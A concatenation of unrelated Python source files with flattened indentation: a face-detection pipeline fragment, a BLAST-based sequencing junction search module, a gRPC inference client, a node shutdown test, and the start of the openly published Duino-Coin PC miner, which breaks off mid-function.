print('[INFO] face detector - softmax threshold = ',detThreshold)
if not args.get("nmsthreshold",False):
nmsThreshold = 0.35
else:
nmsThreshold = float(args["nmsthreshold"])
print('[INFO] face detector - NMS threshold = ',nmsThreshold)
if not args.get("threads",False):
threads = 4
else:
threads = int(args["threads"])
print('[INFO] number of worker threads = ', threads )
# Initialize VART API
dpu = runner.Runner("/usr/share/vitis_ai_library/models/densebox_640_360")[0]
# Init synchronous queues for inter-thread communication
queueIn = queue.Queue()
queueOut = queue.Queue()
# Launch threads
threadAll = []
tc = threading.Thread(target=taskCapture, args=(inputId,queueIn))
threadAll.append(tc)
for i in range(threads):
tw = threading.Thread(target=taskWorker, args=(i,dpu,detThreshold,nmsThreshold,queueIn,queueOut))
threadAll.append(tw)
td = threading.Thread(target=taskDisplay, args=(queueOut,))
threadAll.append(td)
for x in threadAll:
x.start()
# Wait for all threads to stop
for x in threadAll:
x.join()
# Cleanup VART API
del dpu
if __name__ == "__main__":
main(sys.argv)
|
junctionf_gui.py
|
import os
import sys
import struct
import cPickle
import subprocess
from sys import platform as _platform
from collections import Counter
import threading
import multiprocessing
import functions.process as process
import functions.structures as sts
import libraries.joblib.parallel as Parallel
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class junctionf():
def __init__(self, f, p):
self.fileio = f
self.printio = p
self.process = process.process()
self.blast_pipe = None
self._spin = None
def sigterm_handler(self, _signo, _stack_frame):
if self.blast_pipe:
self.blast_pipe.terminate()
if self._spin:
self._spin.stop()
if self.blast_pipe < 0:
print ">>> Terminated Process (%d). Now Exiting Gracefully!" % self.blast_pipe
sys.stdout.flush()
else:
print ">>> All Process Terminated. Exiting Gracefully!"
sys.stdout.flush()
sys.exit()
def _getjunction(self, begin):
var = ''
infile = open(os.path.join(os.curdir, "Y2Hreadme.txt"), 'r')
for line in infile:
if begin in line:
var = (next(infile))
infile.close()
return var
def _get_unprocessed_files(self, list, suffix1, processed_list, suffix2):
for processed_file in processed_list:
for f in list:
if f.replace(suffix1, "") == processed_file.replace(suffix2, ""):
list.remove(f)
break
return list
def junction_search(self, directory, junction_folder, input_data_folder, blast_results_folder,
blast_results_query, junctions_array, exclusion_sequence):
# junction_sequence = self._getjunction(">junctionseq")
exclusion_sequence.upper()
jseqs = self._make_search_junctions(junctions_array)
print ">>> The primary, secondary, and tertiary sequences searched are:"
sys.stdout.flush()
unmapped_sam_files = self.fileio.get_sam_filelist(directory, input_data_folder)
print '>>> Starting junction search.'
sys.stdout.flush()
for f in unmapped_sam_files:
print '>>> File: ', f
sys.stdout.flush()
filename = os.path.join(directory, input_data_folder, f)
input_filehandle = open(filename)
input_file_size = os.path.getsize(filename)
output_filehandle = open(os.path.join(directory, junction_folder, f.replace(".sam", '.junctions.txt')), 'w')
# self._search_for_HA(input_file, junct1, junct2, junct3, exclusion_sequence, output_file, f, input_file_size)
# self._search_junctions(input_file, junction_sequence, output_file)
self._search_for_junctions(input_filehandle, jseqs, exclusion_sequence, output_filehandle, f, input_file_size)
output_filehandle.close()
input_filehandle.close()
self._multi_convert(directory, junction_folder, blast_results_folder)
def _multi_convert(self, directory, infolder, outfolder):
file_list = self.fileio.get_file_list(directory, infolder, ".txt")
print ' '
for f in file_list:
self.fileio.make_FASTA(os.path.join(directory, infolder, f),
os.path.join(directory, outfolder, f[:-4] + ".fa"))
def blast_search(self, directory, db_name, blast_results_folder, blast_results_query):
platform_specific_path = 'osx'
suffix = ''
if _platform == "linux" or _platform == "linux2":
platform_specific_path = 'linux'
elif _platform == "darwin":
platform_specific_path = 'osx'
elif _platform.startswith('win'):
platform_specific_path = 'windows'
suffix = '.exe'
bit_size = 'x' + str(struct.calcsize("P") * 8)
blast_path = os.path.join(os.curdir, 'ncbi_blast', 'bin', platform_specific_path, bit_size)
# self.fileio.check_path(os.curdir, blast_path, 'Cannot find relevant Blast programs in Resources folder')
blast_db = os.path.join(os.curdir, 'ncbi_blast', 'db')
# database_list = self.fileio.get_file_list(blast_db, ".fa")
# selection = select.Selection_Dialog()
# selection.windowTitle('Blast Database Selection')
# selection.populate_list(database_list)
# selection.exec_()
# selection.activateWindow()
# db_selection = selection.selection
db_path = os.path.join(blast_db, db_name)
print ">>> Selected Blast DB: %s" % db_name
sys.stdout.flush()
file_list = self.fileio.get_file_list(directory, blast_results_folder, ".fa")
for file_name in file_list:
output_file = os.path.join(directory, blast_results_folder, file_name.replace(".junctions.fa", '.blast.txt'))
print ">>> Running BLAST search for file: " + file_name
blast_command_list = [os.path.join(blast_path, 'blastn' + suffix),
'-query', os.path.join(directory, 'blast_results', file_name), '-db', db_path,
'-task', 'blastn', '-dust', 'no', '-num_threads', str(Parallel.cpu_count()),
'-outfmt', '7', '-out', output_file, '-evalue', '0.2', '-max_target_seqs', '10']
# blast_command = " ".join(blast_command_list)
sys.stdout.flush()
# os.system(blast_command)
self.blast_pipe = subprocess.Popen(blast_command_list, shell=False)
self.blast_pipe.wait()
def generate_tabulated_blast_results(self, directory, blast_results_folder, blast_results_query_folder, gene_list_file):
blast_list = self.fileio.get_file_list(directory, blast_results_folder, ".txt")
for blasttxt in blast_list:
print ">>> Parsing BLAST results file %s ..." % blasttxt
blast_dict, gene_dict = self._blast_parser(directory, blast_results_folder,
blasttxt, gene_list_file)
for gene in blast_dict.keys():
if gene not in ['total', 'pos_que']:
stats = {'in_orf' : 0, 'in_frame': 0, 'downstream': 0,
'upstream': 0, 'not_in_frame': 0,
'intron' : 0, 'backwards': 0, 'frame_orf': 0, 'total': 0
}
for nm in blast_dict[gene].keys():
for j in blast_dict[gene][nm]:
j.ppm = j.count * 1000000.0 / blast_dict['total']
stats[j.frame] += 1
stats[j.orf] += 1
if j.frame_orf:
stats["frame_orf"] += 1
stats['total'] += 1
blast_dict[gene]['stats'] = stats
blast_query_p = open(os.path.join(directory, blast_results_query_folder,
blasttxt.replace(".blast.txt", ".bqp")), "wb")
cPickle.dump(blast_dict, blast_query_p)
blast_query_p.close()
self.fileio.remove_file(directory, blast_results_folder,
self.fileio.get_file_list(directory, blast_results_folder, ".fa"))
def _junctions_in_read(self, read, jseqs):
match_index = -1
junction_index = -1
for i, j in enumerate(jseqs):
if j in read:
match_index = read.index(j)
junction_index = i
return (junction_index, match_index)
def _search_for_junctions(self, input_filehandle, jseqs, exclusion_sequence, output_filehandle, f, input_file_size):
hits_count = 0
def check_matching_criteria(l, indexes, jseqs, read):
value = 0
if indexes[0] != -1:
junction = jseqs[indexes[0]]
downstream_rf = read[len(junction) + indexes[1] + (indexes[0] % 3) * 4:]
if len(downstream_rf) > 25:
if exclusion_sequence not in downstream_rf or exclusion_sequence == '':
value = 1
protein_sequence = self.process.translate_orf(downstream_rf)
output_filehandle.write(" ".join(l[:4]) + " " + l[9] + " " + downstream_rf
+ " " + protein_sequence + "\n")
return value
reads_count = 0
for line in input_filehandle:
line_split = line.strip().split()
if line_split[0][0] != "@" and line_split[2] == "*":
reads_count += 1
if reads_count % 5000 == 0:
sys.stdout.write('\rRead %.3f%% of file...' % (input_filehandle.tell() * 100.0 / input_file_size))
sys.stdout.flush()
sequence_read = line_split[9]
rev_sequence_read = self.process.reverse_complement(sequence_read)
fwd_indexes = self._junctions_in_read(sequence_read, jseqs)
hit = check_matching_criteria(line_split, fwd_indexes, jseqs, sequence_read)
if hit == 0:
rev_indexes = self._junctions_in_read(rev_sequence_read, jseqs)
hit = check_matching_criteria(line_split, rev_indexes, jseqs, rev_sequence_read)
hits_count += hit
def _make_search_junctions(self, junctions_array):
jseqs = []
for junc in junctions_array:
# jseqs.append(junc[35:50]) These are 15 bp junctions
# jseqs.append(junc[31:46])
# jseqs.append(junc[27:42])
jseqs.append(junc[30:50])
jseqs.append(junc[26:46])
jseqs.append(junc[22:42])
return jseqs
def _get_accession_number_list(self, gene_list_file):
fh = open(os.path.join('lists', gene_list_file), 'r')
gene_list = {}
for line in fh.readlines():
split = line.split()
gene_list[split[0]] = {'gene_name' : split[1],
'orf_start' : int(split[6]) + 1,
'orf_stop' : int(split[7]),
'mRNA' : split[9],
'intron' : split[8],
'chromosome': split[2]
}
return gene_list
def _blast_parser(self, directory, infolder, fileName, gene_list_file):
blast_results_handle = open(os.path.join(directory, infolder, fileName), 'r')
gene_list = self._get_accession_number_list(gene_list_file)
blast_results_count = 0
print_counter = 0
previous_bitscore = 0
results_dictionary = {}
gene_dict = {}
collect_results = 'n'
for line in blast_results_handle.readlines():
line.strip()
split = line.split()
if "BLASTN" in line:
blast_results_count += 1
print_counter += 1
previous_bitscore = 0
if print_counter == 90000: #this if loop is purely for output purposes
sys.stdout.write('.')
print_counter = 0
elif "hits" in line and int(split[1]) < 100: # limits number of blast hits for single read to less than 100
collect_results = 'y'
elif split[0] != '#' and collect_results == 'y' and float(split[2]) > 98 and \
float(split[11]) > 50.0 and float(split[11]) > previous_bitscore:
previous_bitscore = float(split[11]) * 0.98
nm_number = split[1]
gene_name = gene_list[nm_number]['gene_name']
if gene_name not in gene_dict.keys():
gene_dict[gene_name] = [nm_number]
else:
gene_dict[gene_name].append(nm_number)
j = sts.jcnt()
j.position = int(split[8])
j.query_start = int(split[6])
fudge_factor = j.query_start - 1
frame = j.position - gene_list[nm_number]['orf_start'] - fudge_factor
if frame % 3 == 0 or frame == 0:
j.frame = "in_frame"
else:
j.frame = "not_in_frame"
if gene_list[nm_number]['intron'] == "INTRON":
j.frame = "intron"
if int(split[9]) - j.position < 0:
j.frame = "backwards"
if j.position < gene_list[nm_number]['orf_start']:
j.orf = "upstream"
elif j.position > gene_list[nm_number]['orf_stop']:
j.orf = "downstream"
else:
j.orf = "in_orf"
if j.frame == 'in_frame' and j.orf == 'in_orf':
j.frame_orf = True
if gene_name not in results_dictionary.keys():
results_dictionary[gene_name] = {}
results_dictionary[gene_name][nm_number] = [j]
else:
if nm_number not in results_dictionary[gene_name].keys():
results_dictionary[gene_name][nm_number] = []
junction_present = False
junction_index = 0
for index, pj in enumerate(results_dictionary[gene_name][nm_number]):
if pj.position == j.position and pj.query_start == j.query_start:
junction_index = index
junction_present = True
if junction_present:
results_dictionary[gene_name][nm_number][junction_index].count += 1
else:
results_dictionary[gene_name][nm_number].append(j)
else:
collect_results = 'n'
results_dictionary['total'] = blast_results_count
blast_results_handle.close()
return results_dictionary, gene_dict
# def _search_junctions(self, infile, junction_sequence, outfile):
# def longest_common_substring(s1, s2):
# m = [[0] * (1 + len(s2)) for i in xrange(1 + len(s1))]
# longest, x_longest = 0, 0
# for x in xrange(1, 1 + len(s1)):
# for y in xrange(1, 1 + len(s2)):
# if s1[x - 1] == s2[y - 1]:
# m[x][y] = m[x - 1][y - 1] + 1
# if m[x][y] > longest:
# longest = m[x][y]
# x_longest = x
# else:
# m[x][y] = 0
# return s1[x_longest - longest: x_longest]
# reads = 0
# iterations = 0
# reverse_junction_sequence = self.process.reverse_complement(junction_sequence)
# for line in infile.readlines():
# split = line.split()
# if split[0][0] != '@' and split[2] == '*':
# read = split[9]
# reads += 1
# iterations += 1
# if iterations == 5000:
# iterations = 0
# sys.stdout.write('.', )
# sys.stdout.flush()
# substring = longest_common_substring(junction_sequence, read)
# rev_substring = longest_common_substring(reverse_junction_sequence, read)
# jloc = junction_sequence.find(substring) + len(substring)
# jloc_rev = reverse_junction_sequence.find(rev_substring) + len(rev_substring)
# rloc = read.find(substring) + len(substring) + len(junction_sequence) - jloc
# rloc_rev = read.find(reverse_junction_sequence) + len(rev_substring) + \
# len(reverse_junction_sequence) - jloc_rev
#
# if jloc >= len(junction_sequence) - 1 and len(read) - rloc > 25 and len(substring) > 15:
# outfile.write(str(split[0]) + " "
# + str(split[1]) + " "
# + str(split[2]) + " "
# + str(split[3]) + " "
# + str(split[9]) + " "
# + read[rloc:] + " "
# + self.process.translate_orf(read[rloc:]) + "\n")
# continue
#
# if jloc_rev >= len(reverse_junction_sequence) - 1 and len(read) - rloc_rev > 25 and len(rev_substring) > 15:
# outfile.write(str(split[0]) + " "
# + str(split[1]) + " "
# + str(split[2]) + " "
# + str(split[3]) + " "
# + str(split[9]) + " "
# + read[rloc_rev:] + " "
# + self.process.translate_orf(read[rloc_rev:]) + "\n")
# def _search_for_HA(self, infile, primaryJunct, secondaryJunct, tertiaryJunct, exclusion_sequence, OutFile, f,
# input_file_size):
# HA = primaryJunct
# HArev = self.process.reverse_complement(HA)
# HA2 = secondaryJunct
# HA2rev = self.process.reverse_complement(HA2)
# HA3 = tertiaryJunct
# HA3rev = self.process.reverse_complement(HA2)
# Hits2 = 0
# Hits = 0
# reads = 0
# iterations = 0
# toggle = 0
# self.printio.print_progress(f, 0, 0, 0, 1)
# for line in infile:
# line.strip()
# splitLine = line.split()
# if splitLine[0][0] != '@' and splitLine[2] == '*':
# reads += 1
# iterations += 1
# if iterations == 5000:
# iterations = 0
# sys.stdout.write('\rRead %.3f%% of file...' % (infile.tell() * 100.0 / input_file_size))
# sys.stdout.flush()
#
# if HA in splitLine[9] or HArev in splitLine[9] or HA2 in splitLine[9] or \
# HA2rev in splitLine[9] or HA3 in splitLine[9] or HA3rev in splitLine[9]:
# Hits += 1
# if HA in splitLine[9]:
# HAindex = splitLine[9].index(HA)
# DSRF = splitLine[9][(HAindex + len(HA)):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HArev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HAindex = HARevCom.index(HA)
# DSRF = HARevCom[(HAindex + len(HA)):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA2 in splitLine[9]:
# HA2index = splitLine[9].index(HA2)
# DSRF = splitLine[9][(HA2index + len(HA2) + 4):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA2rev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HA2index = HARevCom.index(HA2)
# DSRF = HARevCom[(HA2index + len(HA2) + 4):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA3 in splitLine[9]:
# HA3index = splitLine[9].index(HA3)
# DSRF = splitLine[9][(HA3index + len(HA3) + 8):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# elif HA3rev in splitLine[9]:
# HARevCom = self.process.reverse_complement(splitLine[9])
# HA3index = HARevCom.index(HA3)
# DSRF = splitLine[9][(HA3index + len(HA3) + 8):]
# if len(DSRF) > 25:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# Protein = self.process.translate_orf(DSRF)
# Hits2 += 1
# toggle = 1
# if toggle == 1:
# if exclusion_sequence not in DSRF or exclusion_sequence == '':
# OutFile.write(str(splitLine[0]) + " " + str(splitLine[1]) + " " + str(splitLine[2]) + " " + str(
# splitLine[3]) + " " + str(splitLine[9]) + " " + DSRF + " " + Protein + "\n")
# toggle = 0
|
inference_request.py
|
import grpc
import time
import json
import sys
from arch.api.proto import inference_service_pb2
from arch.api.proto import inference_service_pb2_grpc
import threading
def run(address):
ths = []
with grpc.insecure_channel(address) as channel:
for i in range(1):
th = threading.Thread(target=send, args=(channel, ))
ths.append(th)
st = int(time.time())
for th in ths:
th.start()
for th in ths:
th.join()
et = int(time.time())
def send(channel):
stub = inference_service_pb2_grpc.InferenceServiceStub(channel)
request = inference_service_pb2.InferenceRequest()
request.local.role = 'guest'
request.local.partyId = 9999
request.role['guest'].partyId.append(9999)
request.role['host'].partyId.append(10000)
request.role['arbiter'].partyId.append(10000)
request.sceneId = 50000
data = {}
data["123456"] = {}
data["123456"]["fid1"] = 5.1
data["123456"]["fid2"] = 6.2
data["123456"]["fid3"] = 7.6
request.data = json.dumps(data).encode(encoding="utf-8")
response = stub.predict(request)
print(response)
if __name__ == '__main__':
run(sys.argv[1])
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test monkecoind shutdown."""
from test_framework.test_framework import MonkecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MonkecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner v2.7 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
cpu = cpuinfo.get_cpu_info()
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.7
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = " "
COG = " @"
if os.name != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
if (int(eff) != 100
and nonce % (1_000 * int(eff)) == 0):
if psutil.cpu_percent() > int(eff):
sleep(1/100*int(eff))
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
if (int(eff) != 100
and nonce % (1_000 * int(eff)) == 0):
if psutil.cpu_percent() > int(eff):
sleep(1/100/int(eff))
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
try:
pretty_print(get_string("connection_search"),
"warning", "net0")
response = requests.get(
"https://server.duinocoin.com/getPool").json()
pretty_print(get_string('connecting_node')
+ Fore.RESET + Style.NORMAL
+ str(response["name"]),
"success", "net0")
return (response["ip"], response["port"])
except KeyboardInterrupt:
_exit(0)
except Exception as e:
pretty_print("Error retrieving mining node: "
+ str(e) + ", retrying in 15s",
"error", "net0")
sleep(15)
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formated uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string("uptime_seconds")
elif uptime == 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hours")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + " diff " + str(diff) + " ∙ " + Fore.CYAN
+ "ping " + str("%02.0f" % int(ping)) + "ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (v" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
